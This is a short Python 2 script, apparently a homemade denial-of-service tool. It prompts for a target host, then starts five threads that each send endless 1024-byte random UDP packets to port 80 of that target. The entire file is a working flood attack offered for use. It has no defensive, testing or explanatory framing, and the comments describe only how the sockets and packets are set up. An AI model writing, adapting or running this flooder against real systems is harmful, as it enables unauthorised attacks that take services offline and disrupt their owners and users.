import socket  
import os
import threading 

print "Example www.target.com OR  127.0.0.1"
asktarget = raw_input("Target :  ")

def b3mb4m():
    server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); 
    #AF_INET support IPV4 
    #Make UDP protocol(SOCK_DGRAM)
    ose = os.urandom(1024);#Make 1024 byte random string

    cout = 1;
    while True:
      server.sendto(ose,(asktarget, 80))#Target + port 
      print  'Wo' * cout;
      cout = cout + 1;
      if cout == 10:
          cout = 1;

if __name__ == '__main__':
    threads = []
    for i in range(5):
        t = threading.Thread(target=b3mb4m)
        threads.append(t)
        t.start() 
